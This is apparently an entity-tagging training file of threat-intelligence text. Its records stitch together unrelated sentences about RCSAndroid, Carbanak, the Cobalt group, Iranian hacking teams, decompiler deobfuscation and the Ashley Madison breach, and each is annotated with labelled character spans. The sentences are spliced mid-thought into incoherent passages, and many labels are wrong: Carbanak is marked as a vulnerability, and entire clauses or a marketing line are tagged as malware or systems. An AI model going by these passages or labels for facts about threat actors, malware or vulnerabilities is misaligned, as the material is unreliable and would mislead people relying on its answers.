{"text": "This can also define what kind of evidences to collect . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . The next portion of first block and each flattened block is decided by a \u201c block comparison variable \u201d Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": [{"start": 57, "end": 65, "label": "Vulnerability"}, {"start": 305, "end": 324, "label": "Malware"}, {"start": 333, "end": 548, "label": "Malware"}]}
{"text": "Based on emails leaked in the dump , a number of Czech firms appear to be in business with the Hacking team , including a major IT partner in the Olympic Games . Sensitive bank documents have be found on the servers that were controlling Carbanak . with an immediate value . In most cases , the file is an Excel spreadsheet containing a VBA macro , but we also found four instances where a malicious PowerPoint OLE2 ( PPT ) file was used , possibly indicating the actor 's readiness to use file formats less commonly used in attacks .", "spans": [{"start": 238, "end": 246, "label": "Vulnerability"}, {"start": 295, "end": 346, "label": "Indicator"}, {"start": 390, "end": 423, "label": "Malware"}, {"start": 460, "end": 532, "label": "Indicator"}]}
{"text": "Dropping Cluster Bombs RCSAndroid is a threat that works like a cluster bomb in that it deploys multiple dangerous exploits and uses various techniques to easily infect Android devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . The value of the variable is assigned to a specific register in each block then compared in a control flow dispatcher and other condition blocks . The initial payloads and second stage backdoors were removed from the system .", "spans": [{"start": 23, "end": 33, "label": "Malware"}, {"start": 169, "end": 176, "label": "System"}, {"start": 225, "end": 233, "label": "Vulnerability"}, {"start": 234, "end": 243, "label": "Organization"}]}
{"text": "While analyzing the code , we found that the whole system consists of four critical components , as follows : penetration solutions , ways to get inside the device , either via SMS/email or a legitimate app low-level native code , advanced exploits and spy tools beyond Android \u2019 s security framework high-level Java agent \u2013 the app \u2019 s malicious APK command-and-control ( C & C ) servers , used to remotely send/receive malicious commands Attackers use two methods to get targets to download RCSAndroid . FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 . If the variable registers for the comparison and assignment are different , Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 270, "end": 277, "label": "System"}, {"start": 493, "end": 503, "label": "Malware"}, {"start": 506, "end": 510, "label": "Organization"}, {"start": 538, "end": 550, "label": "Organization"}, {"start": 745, "end": 792, "label": "Vulnerability"}]}
{"text": "The first method is to send a specially crafted URL to the target via SMS or email . As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process . the assignment variable is called \u201c block update variable \u201d CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": [{"start": 147, "end": 155, "label": "Organization"}, {"start": 170, "end": 174, "label": "Organization"}, {"start": 373, "end": 405, "label": "Organization"}, {"start": 533, "end": 556, "label": "Organization"}]}
{"text": "The URL will trigger exploits for arbitrary memory read ( CVE-2012-2825 ) and heap buffer overflow ( CVE-2012-2871 ) vulnerabilities in the default browsers of Android versions 4.0 Ice Cream Sandwich to 4.3 Jelly Bean , allowing another local privilege escalation exploit to execute . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . ( which is further explained later ) The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": [{"start": 34, "end": 73, "label": "Vulnerability"}, {"start": 78, "end": 116, "label": "Vulnerability"}, {"start": 160, "end": 199, "label": "System"}, {"start": 203, "end": 217, "label": "System"}, {"start": 305, "end": 313, "label": "Vulnerability"}, {"start": 380, "end": 389, "label": "Organization"}, {"start": 430, "end": 448, "label": "Organization"}, {"start": 472, "end": 481, "label": "Organization"}, {"start": 563, "end": 665, "label": "Indicator"}]}
{"text": "When root privilege is gained , a shell backdoor and malicious RCSAndroid agent APK file will be installed The second method is to use a stealthy backdoor app such as ANDROIDOS_HTBENEWS.A , which was designed to bypass Google Play . While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms . . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": [{"start": 63, "end": 73, "label": "Malware"}, {"start": 167, "end": 187, "label": "Malware"}, {"start": 219, "end": 230, "label": "System"}, {"start": 239, "end": 243, "label": "Organization"}, {"start": 257, "end": 260, "label": "System"}, {"start": 356, "end": 606, "label": "Malware"}]}
{"text": "The role of ANDROIDOS_HTBENEWS.A and the malicious APK mentioned in the first method is to exploit a local privilege escalation vulnerability in Android devices . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . The algorithm looks straightforward however some portions of the code had to be modified in order to correctly deobfuscate the code . But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": [{"start": 12, "end": 32, "label": "Malware"}, {"start": 101, "end": 141, "label": "Vulnerability"}, {"start": 235, "end": 243, "label": "Vulnerability"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 289, "end": 306, "label": "Organization"}, {"start": 309, "end": 324, "label": "Organization"}, {"start": 329, "end": 341, "label": "Organization"}, {"start": 513, "end": 517, "label": "Organization"}]}
{"text": "Hacking Team has been known to use both CVE-2014-3153 and CVE-2013-6282 in their attacks . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . This is further detailed below . In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": [{"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 58, "end": 71, "label": "Vulnerability"}, {"start": 91, "end": 99, "label": "Vulnerability"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 267, "end": 274, "label": "System"}, {"start": 324, "end": 336, "label": "Organization"}, {"start": 358, "end": 374, "label": "Organization"}, {"start": 398, "end": 444, "label": "Malware"}]}
{"text": "The said exploits will root the device and install a shell backdoor . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . As previously detailed , Leveraging legitimate tools , publicly available malware , and livingofftheland tactics , MuddyWater focused on targeting Exchange Servers as part of a larger effort to deploy web shells and establish a backdoor within target networks .", "spans": [{"start": 74, "end": 79, "label": "Organization"}, {"start": 147, "end": 155, "label": "Organization"}, {"start": 247, "end": 254, "label": "System"}, {"start": 293, "end": 309, "label": "System"}, {"start": 312, "end": 338, "label": "Malware"}, {"start": 372, "end": 382, "label": "Organization"}, {"start": 404, "end": 420, "label": "System"}]}
{"text": "The shell backdoor then installs the RCSAndroid agent . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . the original implementation of the code only works in MMAT_LOCOPT maturity level . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 37, "end": 47, "label": "Malware"}, {"start": 66, "end": 74, "label": "Vulnerability"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 121, "end": 139, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 243, "end": 254, "label": "System"}]}
{"text": "This agent has two core modules , the Evidence Collector and the Event Action Trigger . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . Rolles said this was to handle another obfuscation called \u201c Odd Stack Manipulations \u201d Russia has historically used self - proclaimed hacktivist groups as a means to obfuscate its role in operations against Western nations and it is plausible that Zarya or various pro - Russia hacktivists that have risen to prominence since Russia \u2019s invasion of Ukraine may either be cooperating or coordinating with , or a front for , the Russian security intelligence services .", "spans": [{"start": 99, "end": 107, "label": "Vulnerability"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 179, "end": 194, "label": "Organization"}, {"start": 312, "end": 347, "label": "Organization"}, {"start": 403, "end": 418, "label": "Organization"}, {"start": 444, "end": 449, "label": "Organization"}, {"start": 461, "end": 485, "label": "Organization"}, {"start": 622, "end": 660, "label": "Organization"}]}
{"text": "The Evidence Collector module is responsible for the spying routines outlined above . The first successful bank robbery was committed by this group in January 2013 . , Anonymous Sudan accounted for 63 % of total identified DDoS attacks claimed by the KillNet collective in 2023 .", "spans": [{"start": 142, "end": 147, "label": "Organization"}, {"start": 168, "end": 183, "label": "Organization"}, {"start": 223, "end": 235, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}]}
{"text": "One of its most notable routines is capturing voice calls in real time by hooking into the \u201c mediaserver \u201d system service . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . referred in his blog ) None Use of open source libraries for protocol implementation : The availability of open source projects that implement OT protocols can lower the barrier of entry for actors attempting to interact with OT devices .", "spans": [{"start": 195, "end": 203, "label": "Vulnerability"}, {"start": 298, "end": 308, "label": "System"}, {"start": 313, "end": 324, "label": "System"}, {"start": 362, "end": 411, "label": "System"}, {"start": 434, "end": 482, "label": "System"}]}
{"text": "The basic idea is to hook the voice call process in mediaserver . We have no evidence of compromises against banks in Western Europe or United States , but it should be noted that the attackers methods could be utilized against banks outside of Russia as well . . Given the evolving state of ransomware payout demands , government regulations are already underway to help public and private companies prevent and respond to ransomware attacks .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 372, "end": 400, "label": "Organization"}]}
{"text": "Take voice call playback process for example . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . However the unflattening of ANEL code had to be performed in the later maturity level since the assignment of block comparison variable heavily depends on opaque predicates . The first script is the RAW data the retrieved from the JS file and the second one is the decoded one .", "spans": [{"start": 75, "end": 83, "label": "Vulnerability"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 268, "end": 272, "label": "Malware"}, {"start": 435, "end": 447, "label": "Indicator"}, {"start": 452, "end": 478, "label": "Indicator"}, {"start": 483, "end": 516, "label": "Indicator"}]}
{"text": "The mediaserver will first builds a new unique track , start to play the track , loop play all audio buffer , then finally stop the playback . Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group . As an example in the following obfuscated function , Ready to learn more about Malwarebytes for Business ?", "spans": [{"start": 181, "end": 190, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 327, "end": 332, "label": "Organization"}, {"start": 376, "end": 390, "label": "Organization"}, {"start": 472, "end": 497, "label": "System"}]}
{"text": "The raw wave audio buffer frame can be dumped in the getNextBuffer ( ) function . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 . the v3 and v7 variables are assigned to the block comparison variable ( b_cmp ) Function has a couple of Anti debugging Anti Emulation checks .", "spans": [{"start": 82, "end": 97, "label": "Organization"}, {"start": 112, "end": 132, "label": "Organization"}, {"start": 275, "end": 289, "label": "System"}, {"start": 290, "end": 311, "label": "System"}]}
{"text": "With the help of the open-source Android Dynamic Binary Instrumentation Toolkit and root privilege , it is possible to intercept any function execution . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 182, "end": 197, "label": "Organization"}, {"start": 258, "end": 266, "label": "Organization"}, {"start": 302, "end": 310, "label": "Vulnerability"}, {"start": 328, "end": 349, "label": "Organization"}, {"start": 362, "end": 375, "label": "Organization"}, {"start": 382, "end": 386, "label": "Organization"}]}
{"text": "The Event Action Trigger module triggers malicious actions based on certain events . The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research . However the values are dependent on opaque predicates results . Mandiant observed UNC4899 utilize various VPN providers as a final hop , the most common being ExpressVPN , but connections to NordVPN , TorGuard and many other providers have also been observed .", "spans": [{"start": 89, "end": 105, "label": "Organization"}, {"start": 175, "end": 192, "label": "Organization"}, {"start": 259, "end": 267, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}, {"start": 301, "end": 314, "label": "System"}, {"start": 354, "end": 364, "label": "System"}, {"start": 386, "end": 393, "label": "System"}, {"start": 396, "end": 404, "label": "System"}]}
{"text": "These events can be based on time , charging or battery status , location , connectivity , running apps , focused app , SIM card status , SMS received with keywords , and screen turning on . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . Once the opaque predicates are broken , Sandworm was first observed in the victim \u2019s environment in June 2022 , when the actor deployed the Neo - REGEORG webshell on an internet - facing server .", "spans": [{"start": 403, "end": 416, "label": "Organization"}, {"start": 427, "end": 433, "label": "Organization"}, {"start": 438, "end": 449, "label": "Organization"}, {"start": 492, "end": 500, "label": "Organization"}, {"start": 505, "end": 561, "label": "Indicator"}, {"start": 592, "end": 605, "label": "System"}, {"start": 621, "end": 645, "label": "System"}]}
{"text": "According to the configuration pattern , these actions are registered to certain events : Sync configuration data , upgrade modules , and download new payload ( This uses transport protocol ZProtocol encrypted by AES/CBC/PKCS5Padding algorithm to communicate with the C & C server . Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets . the loop code becomes simpler . What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others \u201c greedy Jew bastards . \u201d", "spans": [{"start": 283, "end": 296, "label": "Organization"}, {"start": 334, "end": 351, "label": "Organization"}, {"start": 355, "end": 370, "label": "Organization"}, {"start": 394, "end": 400, "label": "Organization"}, {"start": 431, "end": 443, "label": "Organization"}, {"start": 557, "end": 566, "label": "Organization"}, {"start": 642, "end": 649, "label": "Organization"}, {"start": 706, "end": 714, "label": "Organization"}, {"start": 743, "end": 751, "label": "Organization"}, {"start": 765, "end": 784, "label": "Organization"}]}
{"text": ") Upload and purge collected evidence Destroy device by resetting locking password Execute shell commands Send SMS with defined content or location Disable network Disable root Uninstall bot To avoid detection and removal of the agent app in the device memory , the RCSAndroid suite also detects emulators or sandboxes , obfuscates code using DexGuard , uses ELF string obfuscator , and adjusts the OOM ( out-of-memory ) value . Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets . Unflattening the code in later maturity levels like MMAT_GLBOPT1 and MMAT_GLBOPT2 ( first and second pass of global optimization ) s determines offsets within files for encryption to control encryption speed .", "spans": [{"start": 266, "end": 276, "label": "Malware"}, {"start": 343, "end": 351, "label": "System"}, {"start": 429, "end": 442, "label": "Organization"}, {"start": 464, "end": 470, "label": "Organization"}, {"start": 501, "end": 513, "label": "Organization"}, {"start": 567, "end": 577, "label": "Organization"}, {"start": 590, "end": 599, "label": "Organization"}, {"start": 662, "end": 674, "label": "System"}, {"start": 679, "end": 691, "label": "System"}, {"start": 743, "end": 817, "label": "Indicator"}]}
{"text": "Interestingly , one unused feature of the app is its ability to manipulate data in the Android package manager to add and remove permissions and components as well as hide the app icon . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" . caused additional problems . While COSMICENERGY \u2019s capabilities are not significantly different from previous OT malware families \u2019 , its discovery highlights several notable developments in the OT threat landscape .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 247, "end": 260, "label": "Organization"}, {"start": 272, "end": 286, "label": "Organization"}, {"start": 340, "end": 355, "label": "Malware"}, {"start": 415, "end": 434, "label": "Malware"}]}
{"text": "Recommendations Popular mobile platforms like Android are common targets for organized or commercialized monitoring operations . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . The unflattening algorithm requires mapping information between block comparison variable and the actual block number ( mblock_t : :s erial ) In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": [{"start": 46, "end": 53, "label": "System"}, {"start": 239, "end": 256, "label": "Organization"}, {"start": 450, "end": 469, "label": "System"}, {"start": 486, "end": 498, "label": "Organization"}, {"start": 520, "end": 536, "label": "Organization"}, {"start": 560, "end": 606, "label": "Malware"}]}
{"text": "Attackers know that rooting devices via malware exploits is an effective means to control devices and gather information from them . TinyZBot is a bot written in C# and developed by the Cleaver team . used in the microcode . While we can not validate these claims , there are indications that some of these documents are legitimate , which would demonstrate another significant increase in capability for the group .", "spans": [{"start": 133, "end": 141, "label": "System"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 293, "end": 331, "label": "Indicator"}]}
{"text": "In a root broken device , security is a fairy tale . Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 . In later maturity levels , Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework .", "spans": [{"start": 108, "end": 118, "label": "Organization"}, {"start": 121, "end": 129, "label": "Organization"}, {"start": 140, "end": 162, "label": "Organization"}, {"start": 165, "end": 200, "label": "Organization"}, {"start": 203, "end": 211, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 225, "end": 240, "label": "Organization"}, {"start": 330, "end": 339, "label": "Organization"}, {"start": 354, "end": 368, "label": "Malware"}]}
{"text": "Take note of the following best practices to prevent this threat from getting in your device : Disable app installations from unknown , third-party sources . However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . some blocks are deleted by the optimization after defeating opaque predicates , PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": [{"start": 196, "end": 203, "label": "Organization"}, {"start": 257, "end": 267, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 313, "end": 335, "label": "Organization"}, {"start": 483, "end": 504, "label": "Organization"}]}
{"text": "Constantly update your Android devices to the latest version to help prevent exploits , especially in the case of RCSAndroid which can affect only up to version 4.4.4 KitKat . The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia . which removes the mapping information . Most of the URLs and the infrastructure were not accessible at the time of analysis , although we managed to obtain images from three campaigns to recreate the infection chain .", "spans": [{"start": 23, "end": 30, "label": "System"}, {"start": 114, "end": 124, "label": "Malware"}, {"start": 161, "end": 173, "label": "System"}, {"start": 180, "end": 192, "label": "Organization"}, {"start": 342, "end": 346, "label": "System"}]}
{"text": "Note , however , that based on the leak mail from a customer inquiry , Hacking Team was in the process of developing exploits for Android 5.0 Lollipop . Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers . In the example below , The hackers behind the campaign have been identified as Tortoiseshell , which is believed to work on behalf of the Iranian government .", "spans": [{"start": 71, "end": 83, "label": "Organization"}, {"start": 130, "end": 150, "label": "System"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 309, "end": 316, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}, {"start": 361, "end": 374, "label": "Organization"}]}
{"text": "Install a mobile security solution to secure your device from threats . In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . the blue-highlighted immediate value 0x4624F47C is assigned to block comparison variable in the first block . In one exchange on Aug. 16 , 2012 , Ashley Madison \u2019s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": [{"start": 95, "end": 101, "label": "Organization"}, {"start": 448, "end": 480, "label": "Organization"}]}
{"text": "The leaked RCSAndroid code is a commercial weapon now in the wild . To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . The mapping can be created by checking the conditional jump instruction ( jnz ) For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": [{"start": 11, "end": 26, "label": "Malware"}, {"start": 157, "end": 169, "label": "Organization"}, {"start": 200, "end": 206, "label": "System"}, {"start": 381, "end": 393, "label": "Organization"}, {"start": 398, "end": 410, "label": "Organization"}, {"start": 450, "end": 462, "label": "Malware"}, {"start": 587, "end": 597, "label": "Malware"}]}
{"text": "Mobile users are called on to be on top of this news and be on guard for signs of monitoring . Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West . in MMAT_LOCOPT . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 138, "end": 144, "label": "Organization"}, {"start": 174, "end": 198, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 363, "end": 374, "label": "System"}, {"start": 396, "end": 413, "label": "Organization"}, {"start": 425, "end": 436, "label": "Organization"}, {"start": 560, "end": 570, "label": "System"}, {"start": 581, "end": 588, "label": "System"}]}
{"text": "Some indicators may come in the form of peculiar behavior such as unexpected rebooting , finding unfamiliar apps installed , or instant messaging apps suddenly freezing . In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . Additionally here is no mapping information in MMAT_GLBOPT2 because the condition block that contains the variable has been deleted . The response of the initial sent packet knock contains some commands to be executed on the victim machine", "spans": [{"start": 213, "end": 233, "label": "Organization"}, {"start": 355, "end": 368, "label": "System"}, {"start": 418, "end": 430, "label": "System"}, {"start": 505, "end": 588, "label": "Malware"}, {"start": 596, "end": 610, "label": "Organization"}]}
{"text": "Should a device become infected , this backdoor can not be removed without root privilege . The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks . So the next block of the first one in the level can not be determined . Information about executed programs that violate one or more of these rules is recorded in the XProtect Database ( XPdb ) , which is stored in SQLite 3 format and located at /var / protected / xprotect / XPdb .", "spans": [{"start": 136, "end": 158, "label": "Organization"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 205, "end": 211, "label": "Organization"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 228, "end": 239, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 461, "end": 487, "label": "System"}, {"start": 499, "end": 574, "label": "Indicator"}]}
{"text": "Users may be required the help of their device manufacturer to get support for firmware flashing . In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets . To resolve that issue , The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": [{"start": 141, "end": 153, "label": "Organization"}, {"start": 204, "end": 217, "label": "System"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 353, "end": 367, "label": "Organization"}, {"start": 406, "end": 414, "label": "Organization"}]}
{"text": "Trend Micro offers security for Android mobile devices through Mobile Security for Android\u2122 to protect against these types of attacks . This isn't the first time we've seen Cobalt makes this error\u2014back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw . the code was written to link the block comparison variable and block address in MMAT_LOCOPT , But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 32, "end": 39, "label": "System"}, {"start": 63, "end": 91, "label": "System"}, {"start": 173, "end": 179, "label": "Organization"}, {"start": 257, "end": 279, "label": "Organization"}, {"start": 394, "end": 405, "label": "System"}, {"start": 443, "end": 447, "label": "Organization"}]}
{"text": "Find out more about the 7 Android Security Hacks You Need to Do Right Now to keep your mobile data safe . The Carbanak attacks targeting over a 100 financial institutions worldwide . as the block number is changed in each maturity level . For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": [{"start": 26, "end": 33, "label": "System"}, {"start": 148, "end": 170, "label": "Organization"}, {"start": 272, "end": 308, "label": "Organization"}, {"start": 366, "end": 376, "label": "System"}]}
{"text": "Update as of July 23 , 2015 1:00 AM PDT ( UTC-7 ) We have added a link to a previous report discussing this threat . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . If the code can\u2019t determine the mapping in later maturity levels , It is thought they were likely targeted because they might have information on foreign policy of countries towards Iran , negotiations over Irans nuclear program , or information about Iranian dissidents .", "spans": [{"start": 135, "end": 145, "label": "Organization"}, {"start": 157, "end": 165, "label": "Vulnerability"}, {"start": 214, "end": 236, "label": "Organization"}, {"start": 542, "end": 546, "label": "Organization"}, {"start": 567, "end": 572, "label": "Organization"}, {"start": 612, "end": 632, "label": "Organization"}]}
{"text": "Timeline of posts related to the Hacking Team DATE UPDATE July 5 The Italian company Hacking Team was hacked , with more than 400GB of confidential company data made available to the public . Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . it attempts to guess the next block number based on the address , This actor uses these vulnerabilities to deploy webshells including CHINACHOP .", "spans": [{"start": 85, "end": 97, "label": "Organization"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}, {"start": 251, "end": 273, "label": "Organization"}, {"start": 448, "end": 457, "label": "Malware"}]}
{"text": "July 7 Three exploits \u2013 two for Flash Player and one for the Windows kernel\u2014were initially found in the information dump . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . considering each block and instruction addresses . Standard file deletion commands are available on most operating system and device interfaces to perform cleanup , but adversaries may use other tools as well .", "spans": [{"start": 32, "end": 44, "label": "System"}, {"start": 61, "end": 68, "label": "System"}, {"start": 140, "end": 155, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 211, "end": 233, "label": "Organization"}, {"start": 283, "end": 291, "label": "Vulnerability"}, {"start": 296, "end": 302, "label": "System"}, {"start": 356, "end": 387, "label": "System"}, {"start": 474, "end": 485, "label": "Organization"}]}
{"text": "One of these [ CVE-2015-5119 ] was a Flash zero-day . The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . The guessing is not 100% accurate however it works for the majority of obfuscated functions tested . Duqu uses a custom command and control protocol that communicates over commonly used ports , and is frequently encapsulated by application layer protocols.[5 ]", "spans": [{"start": 15, "end": 28, "label": "Vulnerability"}, {"start": 68, "end": 79, "label": "Organization"}, {"start": 230, "end": 252, "label": "Organization"}, {"start": 373, "end": 377, "label": "Organization"}, {"start": 385, "end": 420, "label": "System"}]}
{"text": "The Windows kernel vulnerability ( CVE-2015-2387 ) existed in the open type font manager module ( ATMFD.dll ) and can be exploited to bypass the sandbox mitigation mechanism . One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team . Though the original implementation assumes an obfuscated function has only one control flow dispatcher , Compromise", "spans": [{"start": 4, "end": 32, "label": "Vulnerability"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 98, "end": 107, "label": "Indicator"}, {"start": 187, "end": 199, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 255, "end": 268, "label": "System"}, {"start": 276, "end": 295, "label": "System"}, {"start": 336, "end": 341, "label": "Organization"}]}
{"text": "The Flash zero-day exploit ( CVE-2015-5119 ) was added into the Angler Exploit Kit and Nuclear Exploit Pack . The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . some functions in the ANEL sample have multiple control dispatchers . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 29, "end": 42, "label": "Vulnerability"}, {"start": 64, "end": 82, "label": "Malware"}, {"start": 87, "end": 107, "label": "Malware"}, {"start": 114, "end": 120, "label": "Organization"}, {"start": 271, "end": 293, "label": "Organization"}, {"start": 395, "end": 401, "label": "System"}, {"start": 478, "end": 487, "label": "Organization"}, {"start": 517, "end": 527, "label": "Malware"}, {"start": 548, "end": 559, "label": "System"}, {"start": 562, "end": 570, "label": "Malware"}, {"start": 576, "end": 582, "label": "System"}, {"start": 585, "end": 591, "label": "Malware"}, {"start": 621, "end": 631, "label": "Malware"}, {"start": 660, "end": 666, "label": "System"}]}
{"text": "It was also used in limited attacks in Korea and Japan . The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . Originally the code called the optblock_t : :f unc callback in MMAT_GLBOPT1 and MMAT_GLBOPT2 , By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": [{"start": 61, "end": 73, "label": "Organization"}, {"start": 82, "end": 95, "label": "System"}, {"start": 131, "end": 143, "label": "Organization"}, {"start": 155, "end": 177, "label": "Organization"}, {"start": 254, "end": 273, "label": "System"}, {"start": 286, "end": 298, "label": "System"}, {"start": 303, "end": 315, "label": "System"}]}
